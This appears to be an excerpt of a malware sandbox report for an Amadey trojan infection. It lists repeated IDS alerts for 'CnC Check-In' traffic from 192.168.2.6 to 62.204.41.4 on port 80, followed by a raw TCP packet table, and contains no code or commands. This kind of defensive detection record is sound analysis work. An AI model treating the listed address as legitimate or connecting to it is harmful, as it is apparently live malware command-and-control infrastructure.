192.168.2.662.204.41.450458802027700 02/07/23-20:04:13.302774	TCP	2027700	ET TROJAN Amadey CnC Check-In	50458	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449857802027700 02/07/23-20:01:28.881945	TCP	2027700	ET TROJAN Amadey CnC Check-In	49857	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450162802027700 02/07/23-20:02:58.501955	TCP	2027700	ET TROJAN Amadey CnC Check-In	50162	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450417802027700 02/07/23-20:04:03.329321	TCP	2027700	ET TROJAN Amadey CnC Check-In	50417	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450335802027700 02/07/23-20:03:43.169376	TCP	2027700	ET TROJAN Amadey CnC Check-In	50335	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449973802027700 02/07/23-20:02:00.704664	TCP	2027700	ET TROJAN Amadey CnC Check-In	49973	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450298802027700 02/07/23-20:03:34.067174	TCP	2027700	ET TROJAN Amadey CnC Check-In	50298	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450295802027700 02/07/23-20:03:33.354558	TCP	2027700	ET TROJAN Amadey CnC Check-In	50295	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450038802027700 02/07/23-20:02:20.336644	TCP	2027700	ET TROJAN Amadey CnC Check-In	50038	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450154802027700 02/07/23-20:02:56.574090	TCP	2027700	ET TROJAN Amadey CnC Check-In	50154	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449887802027700 02/07/23-20:01:36.097176	TCP	2027700	ET TROJAN Amadey CnC Check-In	49887	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449762802027700 02/07/23-20:01:01.308698	TCP	2027700	ET TROJAN Amadey CnC Check-In	49762	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450090802027700 02/07/23-20:02:37.310665	TCP	2027700	ET TROJAN Amadey CnC Check-In	50090	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450332802027700 02/07/23-20:03:42.434857	TCP	2027700	ET TROJAN Amadey CnC Check-In	50332	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449930802027700 02/07/23-20:01:50.374173	TCP	2027700	ET TROJAN Amadey CnC Check-In	49930	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450267802027700 02/07/23-20:03:26.438067	TCP	2027700	ET TROJAN Amadey CnC Check-In	50267	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450409802027700 02/07/23-20:04:01.334892	TCP	2027700	ET TROJAN Amadey CnC Check-In	50409	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450448802027700 02/07/23-20:04:10.888532	TCP	2027700	ET TROJAN Amadey CnC Check-In	50448	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449826802027700 02/07/23-20:01:18.795280	TCP	2027700	ET TROJAN Amadey CnC Check-In	49826	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449945802027700 02/07/23-20:01:54.040738	TCP	2027700	ET TROJAN Amadey CnC Check-In	49945	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450157802027700 02/07/23-20:02:57.285145	TCP	2027700	ET TROJAN Amadey CnC Check-In	50157	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449752802027700 02/07/23-20:00:59.119449	TCP	2027700	ET TROJAN Amadey CnC Check-In	49752	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450111802027700 02/07/23-20:02:42.651134	TCP	2027700	ET TROJAN Amadey CnC Check-In	50111	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450371802027700 02/07/23-20:03:52.056353	TCP	2027700	ET TROJAN Amadey CnC Check-In	50371	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449829802027700 02/07/23-20:01:19.514063	TCP	2027700	ET TROJAN Amadey CnC Check-In	49829	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450445802027700 02/07/23-20:04:10.137178	TCP	2027700	ET TROJAN Amadey CnC Check-In	50445	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450259802027700 02/07/23-20:03:22.267663	TCP	2027700	ET TROJAN Amadey CnC Check-In	50259	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450478802027700 02/07/23-20:04:18.186763	TCP	2027700	ET TROJAN Amadey CnC Check-In	50478	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449790802027700 02/07/23-20:01:10.237146	TCP	2027700	ET TROJAN Amadey CnC Check-In	49790	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450129802027700 02/07/23-20:02:48.528501	TCP	2027700	ET TROJAN Amadey CnC Check-In	50129	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450152802027700 02/07/23-20:02:56.096465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50152	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450193802027700 02/07/23-20:03:05.833351	TCP	2027700	ET TROJAN Amadey CnC Check-In	50193	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449741802027700 02/07/23-20:00:56.423673	TCP	2027700	ET TROJAN Amadey CnC Check-In	49741	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450437802027700 02/07/23-20:04:08.206570	TCP	2027700	ET TROJAN Amadey CnC Check-In	50437	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449818802027700 02/07/23-20:01:16.810089	TCP	2027700	ET TROJAN Amadey CnC Check-In	49818	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449902802027700 02/07/23-20:01:39.857998	TCP	2027700	ET TROJAN Amadey CnC Check-In	49902	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450011802027700 02/07/23-20:02:13.661822	TCP	2027700	ET TROJAN Amadey CnC Check-In	50011	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449859802027700 02/07/23-20:01:29.375750	TCP	2027700	ET TROJAN Amadey CnC Check-In	49859	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450230802027700 02/07/23-20:03:14.875718	TCP	2027700	ET TROJAN Amadey CnC Check-In	50230	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450360802027700 02/07/23-20:03:49.278758	TCP	2027700	ET TROJAN Amadey CnC Check-In	50360	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449724802027700 02/07/23-20:00:52.311391	TCP	2027700	ET TROJAN Amadey CnC Check-In	49724	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450052802027700 02/07/23-20:02:23.740043	TCP	2027700	ET TROJAN Amadey CnC Check-In	50052	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450343802027700 02/07/23-20:03:45.134037	TCP	2027700	ET TROJAN Amadey CnC Check-In	50343	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450182802027700 02/07/23-20:03:03.137173	TCP	2027700	ET TROJAN Amadey CnC Check-In	50182	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449795802027700 02/07/23-20:01:11.503277	TCP	2027700	ET TROJAN Amadey CnC Check-In	49795	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450124802027700 02/07/23-20:02:45.914007	TCP	2027700	ET TROJAN Amadey CnC Check-In	50124	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449854802027700 02/07/23-20:01:26.635794	TCP	2027700	ET TROJAN Amadey CnC Check-In	49854	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450307802027700 02/07/23-20:03:36.268284	TCP	2027700	ET TROJAN Amadey CnC Check-In	50307	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449895802027700 02/07/23-20:01:38.089700	TCP	2027700	ET TROJAN Amadey CnC Check-In	49895	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449932802027700 02/07/23-20:01:50.862632	TCP	2027700	ET TROJAN Amadey CnC Check-In	49932	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450302802027700 02/07/23-20:03:35.050150	TCP	2027700	ET TROJAN Amadey CnC Check-In	50302	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450473802027700 02/07/23-20:04:16.958101	TCP	2027700	ET TROJAN Amadey CnC Check-In	50473	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449846802027700 02/07/23-20:01:23.606581	TCP	2027700	ET TROJAN Amadey CnC Check-In	49846	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450465802027700 02/07/23-20:04:14.989652	TCP	2027700	ET TROJAN Amadey CnC Check-In	50465	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450070802027700 02/07/23-20:02:31.982508	TCP	2027700	ET TROJAN Amadey CnC Check-In	50070	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449935802027700 02/07/23-20:01:51.579500	TCP	2027700	ET TROJAN Amadey CnC Check-In	49935	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450076802027700 02/07/23-20:02:33.409323	TCP	2027700	ET TROJAN Amadey CnC Check-In	50076	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450165802027700 02/07/23-20:02:59.233846	TCP	2027700	ET TROJAN Amadey CnC Check-In	50165	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450376802027700 02/07/23-20:03:53.252674	TCP	2027700	ET TROJAN Amadey CnC Check-In	50376	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449892802027700 02/07/23-20:01:37.344208	TCP	2027700	ET TROJAN Amadey CnC Check-In	49892	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449953802027700 02/07/23-20:01:56.032155	TCP	2027700	ET TROJAN Amadey CnC Check-In	49953	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449757802027700 02/07/23-20:01:00.338641	TCP	2027700	ET TROJAN Amadey CnC Check-In	49757	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449981802027700 02/07/23-20:02:02.719021	TCP	2027700	ET TROJAN Amadey CnC Check-In	49981	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450137802027700 02/07/23-20:02:52.411572	TCP	2027700	ET TROJAN Amadey CnC Check-In	50137	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450131802027700 02/07/23-20:02:50.831579	TCP	2027700	ET TROJAN Amadey CnC Check-In	50131	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449864802027700 02/07/23-20:01:30.634611	TCP	2027700	ET TROJAN Amadey CnC Check-In	49864	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449907802027700 02/07/23-20:01:41.092787	TCP	2027700	ET TROJAN Amadey CnC Check-In	49907	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450042802027700 02/07/23-20:02:21.298484	TCP	2027700	ET TROJAN Amadey CnC Check-In	50042	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450198802027700 02/07/23-20:03:07.083063	TCP	2027700	ET TROJAN Amadey CnC Check-In	50198	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450048802027700 02/07/23-20:02:22.753627	TCP	2027700	ET TROJAN Amadey CnC Check-In	50048	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449775802027700 02/07/23-20:01:04.516285	TCP	2027700	ET TROJAN Amadey CnC Check-In	49775	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450287802027700 02/07/23-20:03:31.342737	TCP	2027700	ET TROJAN Amadey CnC Check-In	50287	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450220802027700 02/07/23-20:03:12.442628	TCP	2027700	ET TROJAN Amadey CnC Check-In	50220	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450315802027700 02/07/23-20:03:38.266612	TCP	2027700	ET TROJAN Amadey CnC Check-In	50315	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450226802027700 02/07/23-20:03:13.874522	TCP	2027700	ET TROJAN Amadey CnC Check-In	50226	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450394802027700 02/07/23-20:03:57.671451	TCP	2027700	ET TROJAN Amadey CnC Check-In	50394	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450119802027700 02/07/23-20:02:44.644394	TCP	2027700	ET TROJAN Amadey CnC Check-In	50119	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450208802027700 02/07/23-20:03:09.500907	TCP	2027700	ET TROJAN Amadey CnC Check-In	50208	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450404802027700 02/07/23-20:04:00.112465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50404	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450060802027700 02/07/23-20:02:26.448814	TCP	2027700	ET TROJAN Amadey CnC Check-In	50060	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450103802027700 02/07/23-20:02:40.685701	TCP	2027700	ET TROJAN Amadey CnC Check-In	50103	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450109802027700 02/07/23-20:02:42.172519	TCP	2027700	ET TROJAN Amadey CnC Check-In	50109	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449969802027700 02/07/23-20:01:59.969581	TCP	2027700	ET TROJAN Amadey CnC Check-In	49969	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450080802027700 02/07/23-20:02:34.379327	TCP	2027700	ET TROJAN Amadey CnC Check-In	50080	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449874802027700 02/07/23-20:01:33.109253	TCP	2027700	ET TROJAN Amadey CnC Check-In	49874	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449963802027700 02/07/23-20:01:58.504584	TCP	2027700	ET TROJAN Amadey CnC Check-In	49963	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449785802027700 02/07/23-20:01:07.828926	TCP	2027700	ET TROJAN Amadey CnC Check-In	49785	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450210802027700 02/07/23-20:03:09.990259	TCP	2027700	ET TROJAN Amadey CnC Check-In	50210	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450032802027700 02/07/23-20:02:18.890388	TCP	2027700	ET TROJAN Amadey CnC Check-In	50032	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450014802027700 02/07/23-20:02:14.441730	TCP	2027700	ET TROJAN Amadey CnC Check-In	50014	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450121802027700 02/07/23-20:02:45.141107	TCP	2027700	ET TROJAN Amadey CnC Check-In	50121	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450338802027700 02/07/23-20:03:43.908584	TCP	2027700	ET TROJAN Amadey CnC Check-In	50338	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450427802027700 02/07/23-20:04:05.737324	TCP	2027700	ET TROJAN Amadey CnC Check-In	50427	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449823802027700 02/07/23-20:01:18.077794	TCP	2027700	ET TROJAN Amadey CnC Check-In	49823	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449808802027700 02/07/23-20:01:14.637798	TCP	2027700	ET TROJAN Amadey CnC Check-In	49808	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449820802027700 02/07/23-20:01:17.299894	TCP	2027700	ET TROJAN Amadey CnC Check-In	49820	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449979802027700 02/07/23-20:02:02.207618	TCP	2027700	ET TROJAN Amadey CnC Check-In	49979	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449731802027700 02/07/23-20:00:54.023441	TCP	2027700	ET TROJAN Amadey CnC Check-In	49731	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449912802027700 02/07/23-20:01:42.328220	TCP	2027700	ET TROJAN Amadey CnC Check-In	49912	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449994802027700 02/07/23-20:02:09.136024	TCP	2027700	ET TROJAN Amadey CnC Check-In	49994	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450264802027700 02/07/23-20:03:25.691639	TCP	2027700	ET TROJAN Amadey CnC Check-In	50264	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450353802027700 02/07/23-20:03:47.599615	TCP	2027700	ET TROJAN Amadey CnC Check-In	50353	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449734802027700 02/07/23-20:00:54.737090	TCP	2027700	ET TROJAN Amadey CnC Check-In	49734	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450001802027700 02/07/23-20:02:11.159823	TCP	2027700	ET TROJAN Amadey CnC Check-In	50001	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450350802027700 02/07/23-20:03:46.848980	TCP	2027700	ET TROJAN Amadey CnC Check-In	50350	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450172802027700 02/07/23-20:03:00.921461	TCP	2027700	ET TROJAN Amadey CnC Check-In	50172	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450261802027700 02/07/23-20:03:23.514341	TCP	2027700	ET TROJAN Amadey CnC Check-In	50261	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450442802027700 02/07/23-20:04:09.409561	TCP	2027700	ET TROJAN Amadey CnC Check-In	50442	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450083802027700 02/07/23-20:02:35.239474	TCP	2027700	ET TROJAN Amadey CnC Check-In	50083	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450086802027700 02/07/23-20:02:36.208344	TCP	2027700	ET TROJAN Amadey CnC Check-In	50086	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450004802027700 02/07/23-20:02:11.893867	TCP	2027700	ET TROJAN Amadey CnC Check-In	50004	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450175802027700 02/07/23-20:03:01.662459	TCP	2027700	ET TROJAN Amadey CnC Check-In	50175	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450249802027700 02/07/23-20:03:19.487023	TCP	2027700	ET TROJAN Amadey CnC Check-In	50249	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449925802027700 02/07/23-20:01:47.192101	TCP	2027700	ET TROJAN Amadey CnC Check-In	49925	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450414802027700 02/07/23-20:04:02.595462	TCP	2027700	ET TROJAN Amadey CnC Check-In	50414	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450325802027700 02/07/23-20:03:40.711953	TCP	2027700	ET TROJAN Amadey CnC Check-In	50325	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450455802027700 02/07/23-20:04:12.584652	TCP	2027700	ET TROJAN Amadey CnC Check-In	50455	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449747802027700 02/07/23-20:00:57.887103	TCP	2027700	ET TROJAN Amadey CnC Check-In	49747	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449966802027700 02/07/23-20:01:59.250311	TCP	2027700	ET TROJAN Amadey CnC Check-In	49966	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449877802027700 02/07/23-20:01:33.832947	TCP	2027700	ET TROJAN Amadey CnC Check-In	49877	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449836802027700 02/07/23-20:01:21.202537	TCP	2027700	ET TROJAN Amadey CnC Check-In	49836	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449772802027700 02/07/23-20:01:03.779261	TCP	2027700	ET TROJAN Amadey CnC Check-In	49772	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449788802027700 02/07/23-20:01:09.765672	TCP	2027700	ET TROJAN Amadey CnC Check-In	49788	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449991802027700 02/07/23-20:02:05.764041	TCP	2027700	ET TROJAN Amadey CnC Check-In	49991	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449861802027700 02/07/23-20:01:29.882532	TCP	2027700	ET TROJAN Amadey CnC Check-In	49861	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450058802027700 02/07/23-20:02:25.697906	TCP	2027700	ET TROJAN Amadey CnC Check-In	50058	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450236802027700 02/07/23-20:03:16.324345	TCP	2027700	ET TROJAN Amadey CnC Check-In	50236	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450017802027700 02/07/23-20:02:15.190910	TCP	2027700	ET TROJAN Amadey CnC Check-In	50017	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450366802027700 02/07/23-20:03:50.757393	TCP	2027700	ET TROJAN Amadey CnC Check-In	50366	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450099802027700 02/07/23-20:02:39.663652	TCP	2027700	ET TROJAN Amadey CnC Check-In	50099	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450147802027700 02/07/23-20:02:54.873680	TCP	2027700	ET TROJAN Amadey CnC Check-In	50147	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450188802027700 02/07/23-20:03:04.590702	TCP	2027700	ET TROJAN Amadey CnC Check-In	50188	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450277802027700 02/07/23-20:03:28.892621	TCP	2027700	ET TROJAN Amadey CnC Check-In	50277	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450106802027700 02/07/23-20:02:41.451184	TCP	2027700	ET TROJAN Amadey CnC Check-In	50106	80	192.168.2.6	62.204.41.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 20:00:50.777110100 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.777430058 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.836796045 CET	80	49718	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.837024927 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.839792013 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.840023994 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.878460884 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.895771027 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.938014984 CET	80	49718	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.942157030 CET	80	49718	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.942238092 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:50.958383083 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.958431959 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:50.958585978 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.114259005 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.137717009 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.140268087 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.176861048 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177059889 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177088976 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177117109 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177130938 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177145004 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177175045 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177175045 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177177906 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177192926 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177210093 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177238941 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177247047 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177269936 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177274942 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177303076 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177309036 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177328110 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177334070 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.177356005 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.177378893 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.197297096 CET	80	49718	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.197442055 CET	49718	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.201834917 CET	80	49720	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.202111006 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.202652931 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.239826918 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239861012 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239885092 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239897013 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.239913940 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239943981 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239953995 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.239972115 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.239974976 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.240003109 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.240024090 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.240024090 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.240047932 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.240068913 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.240072012 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.240104914 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.240139008 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.264234066 CET	80	49720	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.268384933 CET	80	49720	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.268486977 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.302772045 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.302845001 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.302895069 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.302941084 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.302957058 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.302989006 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303020000 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303039074 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303060055 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303090096 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303095102 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303137064 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303142071 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303189039 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303189993 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303235054 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303235054 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303278923 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.303287029 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.303340912 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366169930 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366204023 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366229057 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366250038 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366271019 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366292953 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366293907 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366293907 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366314888 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366337061 CET	80	49719	62.204.41.4	192.168.2.6
